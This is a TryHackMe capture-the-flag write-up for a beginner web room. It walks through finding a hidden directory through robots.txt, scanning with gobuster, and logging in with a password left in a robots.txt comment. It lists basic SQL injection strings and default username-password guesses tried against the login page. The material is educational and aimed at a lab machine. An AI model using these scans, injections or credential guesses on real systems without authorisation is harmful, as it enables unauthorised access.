TryHackMe CTF Writeup of Hidden Deep Into my Heart
Hey guys, I am V3n0mKai back again with the New CTF Writeup on the TryHackMe CTF called “Hidden Deep 2026-7-5 06:34:31 Author: infosecwriteups.com(查看原文) 阅读量:2 收藏

Devansh Patel

  • Hey guys, I am V3n0mKai back again with the New CTF Writeup on the TryHackMe CTF called “Hidden Deep Into my Heart”.
  • This CTF is of the web category and from the challenge statement it seems like we have to find something hidden directories in order to get the flag .

Press enter or click to view image in full size

Challenge Photo and Text
  • Now here we have to first on the “Start Machine” and “Start the Attack Box”, after that we will be able to access the website .

Press enter or click to view image in full size

The website page
  • Now here in this we will first of all look for the basic endpoints, files and directory traversal and finding some hidden secrets.
  • So we tried the following things :- robots.txt, sitemap.xml, source code analysis, basic developer tools inspection, trying the basic directories common names on the URL.
  • Robots.txt :- A state policy file which is placed in the root directory of every web application and implements the REP [Robot Exclusion Protocol] which instructs all the web crawlers which URLs to crawl and which URLs not to so as to avoid being sensitive urls appearing in the web searches, decreasing the web traffic as no duplicate search results and etc .
  • Also note the difference between the Crawling and Indexing. Crawling is that thew browser reads the contents of the page and then lists it on the search results and Indexing is just saving the metadata and the urls.
  • But we have the X-Robot-Tag:noindex tag to ensure that the page is not indexed and also does not appear in the search results as well, but for this work the crawling for that page must allowed in the robots.txt because without that it index the page.
  • Sitemap.xml :- It is the extra markup language file of the lists of the important urls of that web application and also the crawlers refer this file as well for the crawling output.
  • Some of the common names of the directories we can try is like :- admin, login, admin-panel, robots.txt, sitemap.xml, secret, index.php and many more. We can also find this in my wordlists and also via github repositories as well.
  • Now in the robots.txt we found one directory names as “cupids_secret_vault” and then when we traversed to that directory we got this .

Press enter or click to view image in full size

Robots.txt

Press enter or click to view image in full size

The Webpage of the directory from the robots.txt
  • Now from here we tried the gobuster scanning on the both parts of the url that is first, normal ip url and then second, the one with directory found from the robots.txt also included as well. So started two scans on that.
  • So before proceeding further we should first understand that what is actually the gobuster tool in detail and also see the most important flags we could use it to extract the information and do effective directory enumeration from that.
  • Gobuster :- This tool for the directory and files enumeration across the web application by crafting the proper command with valid syntax and extracting any sensitive files from the web application as well. This tool is written in the go language.
  • Gobuster is a concurrent brute-force engine written in Go. It: Takes a word, Injects it somewhere, Compares response, Filters output .
  • Below diagrams images shows every important flags and options of the gobuster which we ca use enumeration process.
Gobuster Dir Mode

Press enter or click to view image in full size

Gobuster DNS Mode

Press enter or click to view image in full size

Gobuster VHOST Mode

Press enter or click to view image in full size

Gobuster S3 Mode

Press enter or click to view image in full size

Gobuster Fuzz Mode
  • Now as we have seen the gobuster command all the necessary so for the detecting the hidden directory enumeration we tried the below command .
gobuster dir -u http://10.49.155.99:5000/cupids_secret_vault/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 100

Press enter or click to view image in full size

Scan 1

Press enter or click to view image in full size

Scan 2
  • As we can see that we have found /administrator directory in the scan 2 output. On navigating to the directory it was a login page .

Press enter or click to view image in full size

The administrator path
  • Now here we have to try bit of the brute force and some common techniques of the username and password.
  • So we tried some of them and some basic SQL Injection Payloads like ‘ OR 1=1 — , ‘ AND 1=1 — , ‘ OR 1=2 — , ‘AND 1=2 — but it didn’t worked.
  • Then we tried the combinations like :- admin & admin, admin & password, administrator & admin and etcetra. This also didn’t worked. Now we saw that we also found comment text in the robots.txt which was ‘cupid_arrow_2026!!!’.
  • So keeping the username:admin and the password:cupid_arrow_2026!!!, we attempted and voila we found the flag.

Press enter or click to view image in full size

Final Flag

Final Takeaway

Easy challenges are not about “easy wins.”

Get Devansh Patel’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

They are about sharpening instincts.

This TryHackMe room wasn’t about advanced exploitation.
It was about observation, enumeration, and thinking systematically.

CTFs are not about getting the flag.

They are about training your brain to:

Look at robots.txt even when others skip it.

a.] Understand crawling vs indexing instead of memorizing definitions.
b.] Enumerate directories methodically, not randomly.
c.] Use tools like Gobuster with purpose, not blindly.
d.] Notice comments, hints, and small clues hidden in plain sight.

Security is rarely about complex zero-days.

It is often about:

Misplaced secrets.
Exposed directories.
Poor credential hygiene.
Developers leaving breadcrumbs behind.

This challenge reinforced something important:

Enumeration is power.
Patience is power.
Attention to detail is power.

If this writeup helped you strengthen your fundamentals in web enumeration and directory discovery, consider sharing it with your peers.

More enumeration.
More hidden paths.
More structured thinking.

Happy Hacking.


文章来源: https://infosecwriteups.com/tryhackme-ctf-writeup-of-hidden-deep-into-my-heart-a6624334a4b0?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh